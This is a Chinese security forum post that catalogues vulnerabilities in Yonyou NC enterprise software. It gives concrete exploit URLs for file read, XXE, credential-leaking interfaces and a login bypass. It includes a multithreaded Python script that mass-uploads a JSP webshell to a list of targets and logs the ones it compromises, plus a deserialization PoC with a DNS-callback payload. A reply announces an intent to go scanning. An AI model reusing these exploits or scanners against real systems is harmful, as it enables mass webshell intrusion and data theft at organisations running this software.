整理一下用友NC已知的漏洞

huoxian

今天整理一下NC系统的我已知的漏洞，如有缺失，欢迎大佬补全，因为我项目中遇到nc系统的次数还是很多的

任意文件读取

filename参数可以读取下列所有文件，在某些情况下可以读取利用目录穿越可读取/etc/passwd等文件

http://x.x.x.x/NCFindWeb?service=IPreAlertConfigService&filename=

2.XXE

接口处的XXE漏洞

http://uapws/service/nc.uap.oba.update.IUpdateService?wsdl

3.后台SQL注入

因为需要进后台，这里就暂不说了

4.接口信息泄露

在其中有个接口可以获取数据库账户密码，不过是老版本了

http://x.x.x.x/uapws/service

5.控制台密码绕过

http://x.x.x.x/uapws/index.jsp

有时候这里的密码默认会直接在上面写着，或者123456，不过也可以通过返回包实现任意用户登录，这里我输入hack用户，密码随便填,抓包将返回包0改为1,即可任意用户登录

6、任意文件上传

poc如下

python3 poc.py -u http://1.1.1.1

上传成功后会返回马的路径

import requests

import threadpool

import urllib3

import sys

import argparse

urllib3.disable_warnings()

proxies = {'http': 'http://localhost:8080', 'https': 'http://localhost:8080'}

header = {

"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36",

"Content-Type": "application/x-www-form-urlencoded",

"Referer": "https://google.com",

}

def multithreading(funcname, filename="url.txt", pools=5):

works = []

with open(filename, "r") as f:

for i in f:

func_params = [i.rstrip("\n")]

works.append((func_params, None))

pool = threadpool.ThreadPool(pools)

reqs = threadpool.makeRequests(funcname, works)

[pool.putRequest(req) for req in reqs]

pool.wait()

def wirte_targets(vurl, filename):

with open(filename, "a+") as f:

f.write(vurl + "\n")

return vurl

def exp(u):

uploadHeader = {

"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36",

"Content-Type": "multipart/form-data;",

"Referer": "https://google.com"

}

uploadData = "\xac\xed\x00\x05\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x48\x61\x73\x68\x4d\x61\x70\x05\x07\xda\xc1\xc3\x16\x60\xd1\x03\x00\x02\x46\x00\x0a\x6c\x6f\x61\x64\x46\x61\x63\x74\x6f\x72\x49\x00\x09\x74\x68\x72\x65\x73\x68\x6f\x6c\x64\x78\x70\x3f\x40\x00\x00\x00\x00\x00\x0c\x77\x08\x00\x00\x00\x10\x00\x00\x00\x02\x74\x00\x09\x46\x49\x4c\x45\x5f\x4e\x41\x4d\x45\x74\x00\x09\x74\x30\x30\x6c\x73\x2e\x6a\x73\x70\x74\x00\x10\x54\x41\x52\x47\x45\x54\x5f\x46\x49\x4c\x45\x5f\x50\x41\x54\x48\x74\x00\x10\x2e\x2f\x77\x65\x62\x61\x70\x70\x73\x2f\x6e\x63\x5f\x77\x65\x62\x78"

shellFlag="123123F"

uploadData+=shellFlag

try:

req1 = requests.post(u + "/servlet/FileReceiveServlet", headers=uploadHeader, verify=False, data=uploadData, timeout=25)

if req1.status_code == 200 :

req3=requests.get(u+"/t00ls.jsp",headers=header, verify=False, timeout=25)

if req3.text.index(shellFlag)>=0:

printFlag = "[Getshell]" + u+"/t00ls.jsp" + "\n"

print (printFlag)

wirte_targets(printFlag, "vuln.txt")

except :

pass

#print(printFlag, end="")

if __name__ == "__main__":

if (len(sys.argv)) < 2:

print('useage : python' +str(sys.argv[0]) + ' -h')

else:

parser =argparse.ArgumentParser()

parser.description ='YONYOU UC 6.5 FILE UPLOAD!'

parser.add_argument('-u',help="url -> example [url]http://127.0.0.1[/url]",type=str,dest='check_url')

parser.add_argument('-r',help="url list to file",type=str,dest='check_file')

args =parser.parse_args()

if args.check_url:

exp(args.check_url)

if(args.check_file):

multithreading(exp, args.check_file, 8)

7、最新的NC6.5版本反序列化

漏洞地址为

/service/_xbrl/XbrlPersistenceServlet

poc：

import requests

import threadpool

import urllib3

import sys

import base64

ip = ""

dnslog = "\x79\x37\x64\x70\" #dnslog把字符串转16进制替换该段，测试用的ceye.io可以回显

data = "\xac\xed\x00\x05\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x48\x61\x73\x68\x4d\x61\x70\x05\x07\xda\xc1\xc3\x16\x60\xd1\x03\x00\x02\x46\x00\x0a\x6c\x6f\x61\x64\x46\x61\x63\x74\x6f\x72\x49\x00\x09\x74\x68\x72\x65\x73\x68\x6f\x6c\x64\x78\x70\x3f\x40\x00\x00\x00\x00\x00\x0c\x77\x08\x00\x00\x00\x10\x00\x00\x00\x01\x73\x72\x00\x0c\x6a\x61\x76\x61\x2e\x6e\x65\x74\x2e\x55\x52\x4c\x96\x25\x37\x36\x1a\xfc\xe4\x72\x03\x00\x07\x49\x00\x08\x68\x61\x73\x68\x43\x6f\x64\x65\x49\x00\x04\x70\x6f\x72\x74\x4c\x00\x09\x61\x75\x74\x68\x6f\x72\x69\x74\x79\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x04\x66\x69\x6c\x65\x71\x00\x7e\x00\x03\x4c\x00\x04\x68\x6f\x73\x74\x71\x00\x7e\x00\x03\x4c\x00\x08\x70\x72\x6f\x74\x6f\x63\x6f\x6c\x71\x00\x7e\x00\x03\x4c\x00\x03\x72\x65\x66\x71\x00\x7e\x00\x03\x78\x70\xff\xff\xff\xff\x00\x00\x00\x50\x74\x00\x11"+dnslog+"\x3a\x38\x30\x74\x00\x00\x74\x00\x0e"+dnslog+"\x74\x00\x04\x68\x74\x74\x70\x70\x78\x74\x00\x18\x68\x74\x74\x70\x3a\x2f\x2f"+dnslog+"\x3a\x38\x30\x78"

uploadHeader={"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"}

req = requests.post("http://+"ip"+/service/_xbrl/XbrlPersistenceServlet", headers=uploadHeader, verify=False, data=data, timeout=25)

print (req.text)

8、还有其他的吗？欢迎各位大佬补充下

本文迁移自知识星球“火线Zone”

39332

tql，马上去扫一波